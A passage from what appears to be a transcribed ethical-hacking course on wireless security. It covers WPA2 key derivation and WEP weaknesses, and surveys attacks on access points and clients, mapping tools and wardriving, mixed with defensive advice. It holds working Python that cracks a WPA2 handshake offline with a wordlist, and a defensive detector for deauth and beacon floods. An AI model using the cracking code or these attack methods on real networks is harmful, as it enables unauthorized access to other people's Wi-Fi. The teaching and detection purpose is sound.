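    """Passphrase (8-63 chars) -> 256-bit PMK: PBKDF2-HMAC-SHA1, SSID as salt, 4096 rounds.
    (With WPA2-Enterprise the PMK is instead the first 32 bytes of the EAP MSK.)"""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf(key: bytes, label: bytes, data: bytes, nbytes: int) -> bytes:
    """802.11i PRF-n: HMAC-SHA1(key, label || 0x00 || data || counter), concatenated."""
    out, counter = b"", 0
    while len(out) < nbytes:
        out += hmac.new(key, label + b"\x00" + data + bytes([counter]), hashlib.sha1).digest()
        counter += 1
    return out[:nbytes]


def derive_ptk(pmk: bytes, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PTK (384 bits for CCMP) from PMK, both MACs and both nonces. Only the nonces
    cross the air, so a sniffer cannot compute the PTK without the PMK."""
    data = (min(ap_mac, sta_mac) + max(ap_mac, sta_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    return prf(pmk, b"Pairwise key expansion", data, 48)


def build_msg2(snonce: bytes, replay_counter: int = 1) -> bytes:
    """EAPOL-Key message 2 (station -> AP) with the MIC field zeroed."""
    body = (b"\x02"                            # descriptor type: RSN
            + (0x010A).to_bytes(2, "big")      # key info: pairwise, MIC present, HMAC-SHA1
            + (0).to_bytes(2, "big")           # key length
            + replay_counter.to_bytes(8, "big")
            + snonce                           # 32-byte SNonce
            + bytes(16) + bytes(8) + bytes(8)  # key IV, RSC, key ID (unused in message 2)
            + bytes(MIC_LEN)                   # MIC placeholder
            + (0).to_bytes(2, "big"))          # key data length (RSN IE omitted for brevity)
    return b"\x02\x03" + len(body).to_bytes(2, "big") + body   # EAPOL version 2, type Key


def eapol_mic(kck: bytes, frame: bytes) -> bytes:
    """Key MIC: HMAC-SHA1 over the frame with the MIC field zeroed, truncated to 128 bits."""
    zeroed = frame[:MIC_OFFSET] + bytes(MIC_LEN) + frame[MIC_OFFSET + MIC_LEN:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:MIC_LEN]


def station_msg2(pmk, ap_mac, sta_mac, anonce, snonce) -> bytes:
    """What the station sends (and a sniffer captures): message 2 with a valid MIC."""
    frame = build_msg2(snonce)
    kck = derive_ptk(pmk, ap_mac, sta_mac, anonce, snonce)[:16]   # KCK = first 128 bits of PTK
    mic = eapol_mic(kck, frame)
    return frame[:MIC_OFFSET] + mic + frame[MIC_OFFSET + MIC_LEN:]


def crack_handshake(ssid, ap_mac, sta_mac, anonce, msg2, wordlist):
    """Offline attack: the handshake never carries the PMK, but each candidate passphrase
    can be checked against the captured MIC. Cost per guess is dominated by PBKDF2."""
    snonce = msg2[SNONCE_OFFSET:SNONCE_OFFSET + 32]
    captured_mic = msg2[MIC_OFFSET:MIC_OFFSET + MIC_LEN]
    for candidate in wordlist:
        kck = derive_ptk(pmk_from_passphrase(candidate, ssid), ap_mac, sta_mac, anonce, snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, msg2), captured_mic):
            return candidate
    return None


def demo(wordlist=("password", "letmein", "summer2013", "summer2014", "correct horse battery staple")):
    ssid, passphrase = "CorpWiFi", "summer2014"                # constructed network and weak passphrase
    ap_mac, sta_mac = bytes.fromhex("001122334455"), bytes.fromhex("66778899aabb")
    anonce = hashlib.sha256(b"anonce-for-demo").digest()       # fixed stand-ins for random nonces
    snonce = hashlib.sha256(b"snonce-for-demo").digest()
    captured = station_msg2(pmk_from_passphrase(passphrase, ssid), ap_mac, sta_mac, anonce, snonce)
    return crack_handshake(ssid, ap_mac, sta_mac, anonce, captured, wordlist)


if __name__ == "__main__":
    print(demo())   # the passphrase "summer2014" falls to a five-word list
```

Two things worth noticing: the attacker never needs to be on the network after the capture, because every check happens locally, and the SSID is part of the salt, so a default SSID like "linksys" lets precomputed tables do the PBKDF2 work in advance. A 20-plus character passphrase that is not in any wordlist makes the loop in crack_handshake run forever, which is the whole point of the advice above.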

Summary

So, in this module, we went through and took a look at several things. First, we talked about WEP encryption. How it's not necessarily the best solution, it was a solution, but it has a ton of issues. Maybe it needs to get some therapy. Well, actually there was some therapy, and that was WPA. It was created to help fix some of the problems with WEP. But we also discussed that, because it inherited some of the WEP features, it still was susceptible to wireless attacks. And also when it comes to WPA2. Remember, there's both Personal and Enterprise. Personal can still be hacked. Enterprise editions can also be hacked, but that's a lot more difficult. And if you remember, with WPA2-Enterprise we used a third party, if you will, or a different device that did the authentication for us, something like a RADIUS server. We also then went through and talked about how we can break the encryption. We looked at the IVs, or the initialization vectors, and how weak ones make it easier for us to crack things like WEP. We also talked about, as far as WPA is concerned, that it's still susceptible to things like offline attacks, or the infamous de-authentication attack, as well as the good old standard brute-force attack on WPA keys. Then we went through and we looked at how we can defend ourselves against cracking. Again, just using some technologies and features that we already have in place, or possibly in place, plus just implementing things that we should be doing: longer passphrases, passphrases that aren't made up of actual words. Now we've got a whole chapter coming up on countermeasures for wireless hacking. This was just kind of a brief overview as far as defending against it. So, in the next module, we're going to talk about the threats, or the vectors that we end up opening up because of wireless.

Threats from Wireless


Threats from Wireless

So what are the threats from wireless? Again, it's a great technology, or great medium. Is it really a medium if it's wireless? Eh, that's beside the point. But the aspect is, at least in this course, how do we evaluate the threats, or the possibility of threats, that we expose our networks to? So here comes another one of my famous quotes. This one may have been said while under the influence by Eddie "The Man" Van Halen. He said, "Wireless is wireless and it's digital. When digital first started, I swear I could hear the gap between ones and zeros." Yeah, sure you could, Eddie. You just keep playing that guitar for me, would ya? So in this module, we're going to go through and take a look at the fact that you're going to have lots of issues. Some of those issues are going to include the different types of attacks that can be made against your environment. And we'll go through and look at integrity attacks, confidentiality attacks, availability attacks, and authentication attacks. We'll then go through and look at another vector, which is the attack on the access point. And that's going to include things such as rogue AP attacks, unauthorized associations, HoneySpot, I did not misspell that, a lot of you guys may be thinking honeypot, nope, it's called a HoneySpot AP attack. And we'll also look at some AP MAC spoofing. The other vector would include attacks on the client. And those are going to include things such as a denial-of-service attack on the client as well as ad-hoc attacks, and we'll get our jammin' on. So let's jump into this.

Types of Attacks

So let's look at some of the integrity attacks that you could be a victim of. They can be summed up in several different categories. But the first one we want to talk about is referred to as data frame injection. This is where we go through and we construct and send out forged wireless frames on the network. Another type is referred to as a data replay attack. This is the concept of capturing wireless data frames and then being able to modify them offline and replay them later. We also have WEP injection, which, if you've been around wireless at all, you probably understand what this is, but basically we construct and inject forged WEP-encrypted frames using a keystream we've recovered. Another type of attack is referred to as an IV replay attack. Now, I couldn't come up with any icon when I searched for IV except for a medical icon. So hopefully, you'll bear with me on that one. But this type of attack is implemented by deriving the keystream: you get a message whose plaintext you know sent across the wireless link, and XOR it against the ciphertext. Since the IV, remember that's short for initialization vector, is transmitted with the packet in plaintext, weak and repeated IVs are very easy to spot. And, given enough time and traffic, we can actually recover the entire key. Another type of attack is called a bit-flipping attack. Now this is where the attacker sniffs a frame on the wireless network, flips bits in the encrypted payload and fixes up the WEP checksum, then transmits the modified frame. The access point accepts the modified frame, because the WEP integrity check still passes. But at the destination receiver, when it goes to decapsulate the frame, the IP or TCP checksum fails, and the receiver generates a predictable ICMP error. The attacker just simply sniffs the wireless LAN looking for that encrypted error message, and upon receiving it, the attacker is able to derive the keystream, which is the same thing we do with the IV replay attack. Another type of attack is the EAP replay attack. This is where we go through and capture packets during the EAP authentication process and simply inject them back into the network to gain access. It's kind of the same concept when it comes to a RADIUS replay. This is where we go through and capture the communication between the access point and the authentication server. Remember we talked about RADIUS servers? We can later replay that interaction to see if we can gain access. And, believe it or not, there are actually what they refer to as wireless network viruses. Now these aren't viruses that target computers and nodes; they target access points. One of the most popular ones is called Chameleon, which, when it attacks an AP, doesn't affect how it works, but instead it's able to collect and report credentials of all other Wi-Fi users who are connected to it. And if it found a roadblock where it couldn't access that information, the virus actually sought out, are you ready for this one, other Wi-Fi access points that it could connect to and infect. So your neighbor's access point could actually infect your access point.

As far as confidentiality attacks are concerned, Wi-Fi opens up to several of these. One of them being, obviously, HoneyPot APs. This is just simply where an access point's SSID is set up to be the same as a legitimate access point. There's also session hijacking. This is again very similar to what we see with the wired network, but it's where we manipulate the network so that the attacker's host appears to be the desired destination. Also, obviously, traffic analysis. This can tell us quite a bit about the network infrastructure. Also, eavesdropping. This is, again, where we're just going to capture and look at traffic to see if we can obtain any type of potentially sensitive information. Masquerading is another one. This is where you put on a costume and you run around the office, uh, no, never mind (laughing). This is actually where you pretend to be an authorized user to gain access to a system. We also have the man-in-the-middle attack. Again, this is the same attack as on a wired network, but instead of wires, we use wireless. If you're not familiar with the concept of man-in-the-middle, I recommend going back and watching our Sniffing course. Another confidentiality attack would be, obviously, cracking WEP. Again, just by capturing data we try to recover the WEP key, using either brute force or FMS cryptanalysis. And of course, probably the most notorious is the evil twin access point. Yes, evil twin. (imitating an old-time movie villain) This is where you basically pose as an authorized access point by using the same SSID and, hopefully, users hook into your access point mistakenly.

Now we also have availability attacks. Obviously if someone steals your access point you're going to have a problem with availability, as well as any type of denial-of-service attack. If I go through and send forged authentications or associations from random MACs, I'm going to end up doing an authentication flood. Another type of availability attack would be a disassociation attack. This is where we basically go and just totally destroy the connection between the client and the access point and make the access point totally unavailable. Another type would be a de-authentication flood. This is where we flood clients instead of the access point with forged de-authentication or disassociation frames to disconnect them from the access point. Another type is ARP poisoning. Again, this is exactly the same thing that we do on the wired network. It's also one of our first steps in performing the man-in-the-middle attack. We also have routing attacks. This is where we goof up the routing tables or maybe even try to poison the routes and distribute that information throughout the network via the access point. We also have EAP-Failures. In this case, we look at valid 802.1X EAP exchanges and then send the client a forged EAP-Failure message. And, again, they would disassociate. We also have what they refer to as the power-saving attack. This attack is just basically tricking the access point into believing that the client is in sleep mode, so it holds back or drops the client's frames. Another type is beacon flooding. Now what the attacker does here, in order to take away the availability of the access point, is they go through and generate hundreds and hundreds of thousands of counterfeit 802.11 beacons and distribute those in the air, and it makes it harder for the client to find a legitimate access point. And finally we have the TKIP MIC exploit. This is basically where we go through as an attacker and generate a bunch of TKIP data that exceeds the target's MIC-error threshold. MIC is short for message integrity check. TKIP's countermeasure for two MIC failures within a minute is to shut the link down for a minute and rekey, so by exceeding that threshold we effectively shut down the access point.

We also have authentication attacks. These types of attacks allow us to do things like steal the identity of the person logging in, as well as possibly going through and cracking the PSK or possibly also cracking VPN login information. And while we're talking about cracking, we might as well look at cracking domain login credentials. Most of these are going to be done with brute-force attacks, or possibly using some type of dictionary tool. We also have something called password guessing, where the attacker, having captured a user's identity, just continually attempts 802.1X authentication with that identity to try to guess the user's password. And one of my favorites is obviously application login theft. This is where we capture users' credentials from cleartext application protocols. Oh, you know, 'cause everybody uses different passwords for different apps, right? Nah, typically we use the same password for the app as we do for our login credentials, as well as to gain access to our wireless network. You didn't think about that one, did you?

Attack on the AP

So let's talk about some of the attacks on the APs, or the access points. The first and most common one that we see is a rogue access point attack. I'm going rogue! (laughing) Now what this is is, here we have an office building with multiple floors, and we all have systems that are set up on the different floors for different departments, and maybe we have multiple access points. And all of our computers are hooked into those access points. A rogue access point is simply a device that isn't sanctioned by an administrator but is actually operating on the network anyway. Sometimes these rogue access points are deployed by employees who just want better reception. But from the attacker's perspective, he sets up a rogue access point and places it near the target network. When the user turns their computer on, the rogue access point offers up a connection to the user's wireless NIC. If the user connects to the rogue access point as if it were the legitimate AP, the client is going to try to go through and authenticate itself, and therefore the rogue access point picks up that whole communication channel. Now another type is called an unauthorized association. How this is achieved is, well, we typically see this on laptops. If the attacker's able to compromise a product or device like a laptop, most of these devices have wireless built into them, but they may also be hardwired into the network as well. The attacker installs what we refer to as a soft access point, which is an access point program that runs as software and turns the laptop into an access point. Now if he's successful, other machines might hook into that access point, and he'd be able to capture that information and bridge into the wired network. Now we also have something called HoneySpot AP attacks. So, we've all had our laptops, we've traveled around, and as we visit different locations, like retail locations, they have their standard access points being broadcast, or their SSIDs. So, for example, if I go to McDonald's or Starbucks, a lot of the hotels I stay with use AT&T, and so we see these SSIDs, including the defaults, dlink, netgear, right? Everybody follow me so far? And, as we travel, we just take our laptops and we hook right in. Well, here's the dilemma: that information is stored on your laptop, so the next time you come near an access point that's called Hilton or linksys or dlink, it'll try to connect automatically. So when I return to the hotel, I'm good. Or when I return to Starbucks, I'm good. Do you see where I'm going with this one? So, on a HoneySpot, this is where the attacker goes through and creates an access point that has the same SSIDs as some of these retail locations. And because the signal may be stronger, because I'm sitting next to you, you're going to actually associate to me. Duh, duh, duuhhh. Tell you what, let me show you something here real fast. I'm going to switch out to my laptop so you can see this. So here I've remoted into my laptop. And this is my laptop that I travel with. And I haven't done this in a while, so I may be the shoe repairman whose kids have no shoes, meaning I don't think I've lately gone through and done what I'm about to teach you to do. But that's okay. It's a learning experience for all of us. So you can see here that I'm hooked up to my own network. In this case here, it's called BanburyG. I'm going to select here to manage my known networks. These are networks that I'm used to seeing or that I've been connected to. And you can see several of them in here. One of them being, hey, there's AT&T Wi-Fi. What I'd want to do is, I'd actually want to forget that access point. Here's Courtyard, from when I was at the Marriott. Some of these are companies that I go to all the time, so I stay connected to 'em. Boingo. This is from flying on Southwest, or, excuse me, that was Delta, I believe. Netgear. This would be a connection that I made, I don't know why I made that one, so I'm going to forget that one. This one down here, GrayPeakWireless, this is a training center, one of their network rooms. Here's the Washington Dulles WiFi. Want to forget that one. Let me back up here. And this is more of a Windows 10 issue, but one of the things you want to make sure you do is take this option, "Connect to suggested open hotspots", yeah, let's turn that off. I don't connect up to anything unless I know what it is I'm doing. Now, how you should connect up when you're traveling is, I'm going to select to show available networks. And you would see these listed over here. When you would want to go through and hook into one of them, Aquaman is my neighbor, so I'm going to select to connect. Make sure you disable this "Connect automatically". This will let you hook in, but then in future connections it won't hook back in. GDL thinks that's a helpful hint. I know, anything I can do to make your life easier and safer. So there's another one out there that's called access point, or AP, MAC spoofing. I'm sure you can figure out what this is. We've got our network infrastructure. We've got our wireless systems running. The attacker just simply comes in and spoofs the MAC address of an access point in hopes that somebody hooks up to him. Now let's see. When would this also come into play? Let's say that you're on a transportation device that flies through the air. And they happen to provide wireless internet on your transportation device. And most of these are a paid service. And a legitimate user might actually log in with their laptop, and most of the access is controlled by MAC addresses. And so, therefore, the access point says, "Uh yep, I allow this particular MAC address onto the network." And so somebody who may be curious, not saying I may or may not have done this before, (laughing) but an attacker could go through and simply duplicate the MAC of a client who already paid and be allowed access to the network. I know what you're all thinking. You're thinking, "I'd better look to see if Dale's on my flight."

Attack on the Client

So let's talk about the attacks on clients. These are really simple. And we start off with the most basic one, which is, obviously, a denial-of-service. Under normal circumstances, we have our systems that are hooked up to our Wi-Fi access points. And to just totally jack up a network infrastructure, the attacker might actually send a packet that's called a de-authentication packet to the node, spoofed to look like it came from the access point, which basically knocks it off the wireless. It is no longer associated to the access point, and since de-authentication frames aren't authenticated unless protected management frames are in use, the client has no way to tell it was forged. Very, very simple attack. Another type is referred to as an ad-hoc attack. Now a lot of devices, like laptops, have both Wi-Fi and Ethernet cabling built in to them. And so a user comes in and they click in for, you know, better communication on the network, they click into their RJ45 connection. Well, in an ad-hoc attack, ad-hoc means a peer-to-peer wireless connection with no access point involved. So the attacker simply comes in and creates an ad-hoc connection to your laptop and then is able to pass through it and gain access to the network. So, Super Dale rule number 583, turn off your Wi-Fi if you're hooked in through Ethernet. Another type of attack is via jamming. No, you're not buying that joke? What about this one? Traffic jam? No? How about a paper jam? Still not laughing? Okay, I'll have some fun now. How about jamming with your favorite band? Yeaaah, that's me with Collective Soul. Still not buying it? How about just going out and jamming? No? Still don't get it? How about just putting the rock in the hole? Jamming the ball. Okay, that's actually a picture of my son-in-law when he was a little younger. No, he can't really jump that high. He just came off of our trampoline in the backyard. But the angle looks good, doesn't it? (laughing) So, jamming is exactly what it sounds like. It's where we have a Wi-Fi access point, and we deny service by drowning out the radio frequencies it uses. I personally think sometimes that I wish I had a mobile jammer, here's one right here, that I could turn on in the movie theater for those young'uns that start talking on their phone or texting during the movie. And you can buy a device like this off of the internet. Now, jamming is also extremely popular, especially when it comes to dealing with criminal activities. This is actually a jammer that does several frequencies, including not only cell, but Wi-Fi, Bluetooth, everything. And in this case here, you can see law enforcement's using it. They'll use it in a hostage negotiation situation, so that they can block all signals and control the environment. They also make them so that they're extremely portable for the military. In fact, here's one interesting one. It's a jamming grenade, where you can just toss it into a particular room. No explosions, just jamming of a signal. Actually, if you unscrew the top of that, there's jelly inside.
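The de-authentication and disassociation floods and the beacon flood from the Types of Attacks list earlier, plus the client-side de-auth denial of service just described, seen from the defender's side: a small detector over raw 802.11 management frames, as an added example that is not part of the course. The frames, addresses, timestamps and thresholds are all constructed for the demo; a real deployment would feed it from a monitor-mode interface or a pcap, and would tune the limits to what its own access points normally send.

```python
"""Detecting the de-authentication/disassociation floods and beacon floods
described above, on constructed raw 802.11 management frames.
Added example, not course code: the frames, addresses and timestamps are
fabricated for the demo and the thresholds are illustrative. A real detector
would read frames from a monitor-mode interface or a pcap; only the MAC header
and the SSID element are parsed here.
"""
import struct
from collections import defaultdict, deque

# Frame-control byte 0 = subtype << 4 | type << 2 | version (type 0 = management)
FC_BEACON, FC_DISASSOC, FC_DEAUTH = 0x80, 0xA0, 0xC0


def mgmt_frame(fc0: int, dst: bytes, src: bytes, bssid: bytes, body: bytes, seq: int = 0) -> bytes:
    """Management frame: FC, duration, addr1 (dst), addr2 (src), addr3 (BSSID), seq ctrl, body."""
    return bytes([fc0, 0]) + b"\x00\x00" + dst + src + bssid + struct.pack("<H", seq << 4) + body


def deauth_frame(dst: bytes, src: bytes, bssid: bytes, reason: int = 7) -> bytes:
    return mgmt_frame(FC_DEAUTH, dst, src, bssid, struct.pack("<H", reason))


def beacon_frame(bssid: bytes, ssid: str) -> bytes:
    fixed = struct.pack("<QHH", 0, 100, 0x0411)          # timestamp, interval, capabilities
    ssid_element = bytes([0, len(ssid)]) + ssid.encode()  # element ID 0 = SSID
    return mgmt_frame(FC_BEACON, b"\xff" * 6, bssid, bssid, fixed + ssid_element)


def parse(frame: bytes) -> dict:
    """Type, subtype and the three addresses; plus the SSID element for beacons."""
    if len(frame) < 24:
        raise ValueError("truncated 802.11 header")
    fc0 = frame[0]
    info = {"type": (fc0 >> 2) & 0x3, "subtype": fc0 >> 4,
            "addr1": frame[4:10], "addr2": frame[10:16], "addr3": frame[16:22]}
    if fc0 == FC_BEACON and len(frame) >= 38 and frame[36] == 0:    # 24 header + 12 fixed fields
        info["ssid"] = frame[38:38 + frame[37]].decode("utf-8", "replace")
    return info


class FloodDetector:
    """Sliding-window counters over a monitor-mode feed.
    deauth_flood: more than mgmt_limit deauth/disassoc frames claiming one BSSID
    within `window` seconds (a real AP sends a handful at most).
    beacon_flood: more than ssid_limit distinct SSIDs within `window` seconds,
    the signature of fake-beacon generators."""

    def __init__(self, window: float = 10.0, mgmt_limit: int = 20, ssid_limit: int = 50):
        self.window, self.mgmt_limit, self.ssid_limit = window, mgmt_limit, ssid_limit
        self.kicks = defaultdict(deque)       # bssid -> timestamps of deauth/disassoc frames
        self.beacons = deque()                # (timestamp, ssid)
        self.alerts = []

    def observe(self, now: float, frame: bytes) -> list:
        info = parse(frame)
        if info["type"] != 0:
            return self.alerts                # data/control frames are not management traffic
        if info["subtype"] in (FC_DEAUTH >> 4, FC_DISASSOC >> 4):
            dq = self.kicks[info["addr3"]]
            dq.append(now)
            while now - dq[0] > self.window:
                dq.popleft()
            if len(dq) == self.mgmt_limit + 1:          # fire once when the threshold is crossed
                self.alerts.append(("deauth_flood", info["addr3"].hex(":"), round(now, 2)))
        elif info["subtype"] == FC_BEACON >> 4:
            self.beacons.append((now, info.get("ssid", "")))
            while now - self.beacons[0][0] > self.window:
                self.beacons.popleft()
            distinct = {ssid for _, ssid in self.beacons}
            if len(distinct) == self.ssid_limit + 1:
                self.alerts.append(("beacon_flood", len(distinct), round(now, 2)))
        return self.alerts


def demo() -> list:
    ap, victim = bytes.fromhex("001122334455"), bytes.fromhex("66778899aabb")   # constructed addresses
    det, t = FloodDetector(), 0.0
    for _ in range(30):                       # normal: the AP beacons every ~100 ms ...
        det.observe(t, beacon_frame(ap, "CorpWiFi"))
        t += 0.1
    det.observe(t, deauth_frame(victim, ap, ap, reason=3))   # ... and sends one genuine deauth
    for _ in range(40):                       # attack: forged deauths spoofing the AP against the victim
        det.observe(t, deauth_frame(victim, ap, ap))
        t += 0.01
    for i in range(60):                       # attack: a flood of beacons for networks that do not exist
        det.observe(t, beacon_frame(bytes([2, 0, 0, 0, 0, i]), f"FreeWiFi-{i}"))
        t += 0.01
    return det.alerts


if __name__ == "__main__":
    for alert in demo():
        print(alert)
```

The detector keys the de-auth counter on addr3, the BSSID the frame claims, rather than on the transmitter, because a forged frame carries the access point's own address; the single genuine de-auth in the demo stays well under the limit. The one thing a sensor like this cannot do is tell a forged frame from a real one by inspection, which is exactly why the attack works on clients, and why protected management frames exist.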

Summary
Okay, so in this module, we went through and took a look at several things. One of them being the types of wireless attacks that can take place on your network. If you remember, those included things like confidentiality attacks, integrity attacks, availability attacks, and authentication attacks. And then we went through and talked about attacks on the access points, things like a rogue access point, or AP MAC spoofing, or an unauthorized association, or even the famous HoneySpot AP attacks. And then finally we quickly looked at the attacks on the clients, which included anything from our ad-hoc attacks, our denial-of-service attacks, and, of course, we got our jam on. So now that you understand these concepts, we're next going to go through and take a look at the methodology of hacking wireless. You might see some similarities between the methodology of hacking wired networks and wireless. 'Cause, when you think about it, it really is all the same, right? A network is a network is a network.

The Methodology of Hacking Wireless

The Method of Hacking Wireless

So believe it or not, there is a methodology when it comes to hacking wireless. When it comes to this
methodology, I'm often reflective upon a famous quote by a very shrewd businessman whose name
is Mr. Burns who often says, "Make sure that you release the hounds," meaning, "let's go after this
thing full-heartedly." And a lot of the times, we can do that without being very active at all. In this
module, we're going to go through and we're going to take a look at the method to the madness. And
that is, we're going to first look at how do we find Wi-Fi networks doing Wi-Fi discovery. Then we'll
take a look at GPS mapping. And what I mean by this is being able to obviously pinpoint where the Wi-
Fi networks are located. This isn't like a cable that you can actually trace, so we need to have some
type of way of marking this. We'll then go through and take a look at wireless traffic analysis, followed by launching the attacks against the networks, and then finally going through and cracking the encryption. Now if you try to skip any one of these steps within the methodology itself, you could possibly end up not being very successful in hacking into the wireless network. So let's get going with step one.

Wi-Fi Discovery

So Wi-Fi discovery is your first step in the methodology of hacking wireless networks. And we always
look at this in the same aspect that we do with standard networks that we need to first see what's
going on around the environment itself. And if you remember from our previous courses, one of the
first steps that we go through is the process of footprinting or reconnaissance. All we're doing here is
just taking a look around. And I like to refer to this process as kind of like a looky-loo. If you're not
familiar with that term, let me give you a description. In my state, it just so happens that if you're on
the freeway driving down the road and there's an accident on the other side and you can't see it,
you're required to slow down and see if you can see what's going on, thereby slowing down traffic on
the opposite side, which is nothing but totally frustrating. That's just some road rage. But we refer to
those folks as looky-loos. If you remember, when it comes to footprinting, this is simply where we're
trying to locate and understand the network itself. And we're going to do that a couple of different
ways. One of the first ways that you can use is a passive method. If you remember what we talked
about in previous courses as well, is passive is just sniffing the airwaves, seeing what's there. We're
not hitting anybody. We're not trying to connect with any access point. We're just looking on the
airwaves itself. Then we also have, obviously, active, which is, obviously, a little bit more
intrusive. Maybe I send out a probe request with an SSID to see if an access point responds. Either
way, to accomplish footprinting, you're going to need a couple of things. You can either use your built-
in Wi-Fi network cards on your laptops or your tablets. Now there's some limitations to these. It's based off of what we refer to as the chipset and the manufacturer, which we'll talk about a little bit later on. A limitation of built-in Wi-Fi also is that it's not very directional because it's like 360 degrees
from the laptop itself where I can start using external antennas to start pointing like a Yagi. Remember
our Yagi antenna? I can hook that up to a Wi-Fi card and start pointing in different directions. And
then the other thing I'm going to need here is obviously an application. And yes, I have a plethora-
- See, you didn't think I was going to get that word in on this course, did ya? I have a plethora of
those, some of them being desktop applications and some of the newer ones actually being based off
of mobile. Some of the more common desktop applications include inSSIDer, which is an open source, multi-platform, Wi-Fi-scanning software. And it'll give the attacker information such as the channel each wireless network is using, its signal strength, and whether the access point is filtered. Then, of course, we can export the Wi-Fi and GPS data out to an XML file that we can then use inside of Google Earth. Another product that's out there is called NetSurveyor. This is, again, a network discovery tool that's used to find wireless access points in real time. It's a little bit more GUI as far as its interface is concerned, so it's a little prettier. There's also Vistumbler, which does the same thing, looking for access points, we can export the information, import it into Google Earth. We can look for signal strengths. This product actually got its name when Microsoft released Vista and its server counterpart, which would've been Server 2008: they had a new netsh command, netsh wlan show networks mode=bssid. And it uses that command to get all the wireless
information. WiGLE.net is one of my favorite ones. In fact, I'm going to show you WiGLE.net a little bit
later on. WiGLE.net is an open platform and also a website for collecting information about
different wireless hotspots around the world. It actually started off back in 2000, and by 2013, they
had over 170 million recorded Wi-Fi networks in its database. And out of the 107 million, 105 have
GPS coordinates. We also have something called Kismet. Kismet is a layer 2 wireless network
detector, sniffer, and IDS environment. There is also iStumbler. This is actually a discovery tool that
provides plug-ins for finding, not only access points, but Bluetooth devices, Bonjour services, location
information on Mac-based devices. They have a mobile version that's called miniStumbler that used
to run on the old, ooh, I'm going to bring back some memories here. Anybody remember the iPAQ by
HP, one of the first real handheld devices? And speaking of mobile, we have a couple different
products both in the Android side and on the Apple side. We have Wi-Fi Manager as well as Wi-
FiFoFum. Yeah, insert your own joke there. There's also Network Signal Info. There's Wi-Fi Radar as
well as there is my miniStumbler and the Wi-Fi Analyzer tool. And I'm sure that there's probably even
more since the recording of this course. It's like they're coming out daily now, right? So with at least
two of those three things, again, remember, some type of antenna, either the built-in one or an
external antenna, and a piece of software, we can go looking.

GPS Mapping

So I'm sure that everyone is familiar with GPS, or Global Positioning Systems. We know that these are
big old satellites that are up in space, right? And they help to determine where we're located or where
something is located. Well, taking this technology along with wireless technology, we can actually go
out and hit the road and start mapping out some networks that either we can remember for
ourselves or share with others. Now, again, the GPS receiver is going to just simply go through and
calculate position, time, velocity to help pinpoint where the network is located. Now, some of the
tools that we can use for this include: I mentioned WiGLE already, and I'm going to show you WiGLE
here in just a second, but we also have Skyhook. Now, Skyhook is a big data company that's based out
of Boston, Massachusetts. And originally they were started up as a database for gathering access
points for wardriving folks. Since then, they've gone on to provide location-based services for
companies like Apple, Samsung, Sony, HP, Dell, and almost any of the mapping products out there like
MapQuest. And some of these concepts or these applications come around from the aspect of
marketing. For example, when you walk into your local retail store, maybe Skyhook has determined
via your Samsung device that you're at the local, I don't know, butcher market, and you get an ad for
that butcher. But again, using their technology for evil, we can accomplish some interesting things. We
also have something called WeFi. WeFi is just a little simple program that helps you to find Wi-Fi
hotspots. You can either install it, search out hotspots near you. You can send the information up to
their database. You can also type in an address of where you're trying to go to see if any Wi-Fi is going to be available there for you as well. But enough talk, Dale. Let's do some wardriving. OK, let's
hop in the car. I'm going to take you for a ride, and we'll see what we can see here. So when it comes
to wardriving, the overall concept is I'm going to cover a lot of area and try to pick up as
many accessible access points that I can or networks that are exposed. It's kind of interesting that
when it comes to Wi-Fi, we don't really realize how prevalent it is in our world. Now, granted, we have
our devices that we all hook up to Wi-Fi, but you start multiplying that by the number of people that
are around you and you end up with a ton of wireless transmissions going on everywhere around
you. So I once had a gentleman from Raleigh come out to visit us because we were getting some
interference back when I had my own ISP service. And we couldn't figure out where the
interference was coming from. And he brought out what we refer to as a spectrum analyzer with
him. And it basically showed him all the wireless that was around us, whether it was 2.4
gigahertz, whether it was five gigahertz, whether it was a microwave. It was kind of interesting
because he told me, he said, "You know what, we can't see wireless around us, "but if we could see it,
and you could assign a color "to each frequency, we would see a rainbow "all around us." And when
you start thinking about how many wireless devices you have in your home, average is about 13
devices per house, think about that, 13 devices per house, and most homes have anywhere from
obviously one to two Wi-Fi access points. So the question that comes in is: are they securing those
down? And it's not just residential folks, but it's also businesses, especially small businesses that don't
have a full-time IT person that can go through and make sure that things are locked down for us. So
when it comes to wardriving, we're not necessarily just looking for standard Wi-Fi access points. We
can also use this technique to find Bluetooth. Now think about that one for a second. Bluetooth. What
do we sync with Bluetooth nowadays, if I'm driving down the road? Yeah, our cars. Do we not upload
our address book to our cars so that we can make wireless calls or hands-free calls? Well, literally,
driving down the road, I can pick up a Bluetooth signal from the car next to me. All I have to do is keep pace with him. And if he's not secure enough, I can download his address book or possibly upload a piece of malicious software that executes on his device that allows me then to pwn his environment. So, number one rule when we're using Bluetooth is we turn it off unless we absolutely, positively need it. Now when it comes to wireless, our goal for wardriving is again to go
absolutely, positively need it. Now when it comes to wireless, our goal for wardriving is again to go
through an area and pick up which access points are where, whether they're open or closed, because
that helps me to assign my target. When I'm choosing my target, I'm going to go after things like the
most common aspects like default SSIDs. But if I come across a retail location, like a bank, even though
they may be locked down, I'm going to try to figure out what SSID that they're using so that I can go
after and maybe intercept some of the transmissions going on within that business itself. Now, back
in the old days, when we did wardriving, we had to use laptops. We still use laptops. But it's kind of
interesting how technology has changed things because now we can actually do wardriving with our phones as well as with our tablets. That's what I'm going to attempt to do here is, I didn't bring my laptop. I decided to try to do this with a tablet instead. So I'm going to be using a program called WiGLE, which is kind of an open project where I can use the application to map out my neighborhood and find out what access points, and then upload those to the WiGLE servers, and then everybody else around me or other attackers or even just hobbyists can see what's going on in that area. I've got a neighborhood coming up here. Let's pull in and see what we can find out with my, just with my tablet now, mind you. So what I'm doing here is I'm using my cellphone as an access point for
my tablet, 'cause my tablet doesn't have internet access. And I have my own access point set up for
that, so you're going to see that pop up. So the application I'm using is called, again, WiGLE. And you
can see here that I've got the bat signal which is my own phone. That's what's giving me internet
access so I can then upload this information if I need to. And what I'm looking for here is I'm looking for access points that might give me a direction or a concept of who's using what. Primarily, what I'll be focusing in on is those people that are still using the default SSID for access points, like Linksys or D-Link or Netgear. I might also look for things like access points named after people's homes. So I'm going to start off here, right now, I just pulled over, I'm picking up 16 access points. So we're going to
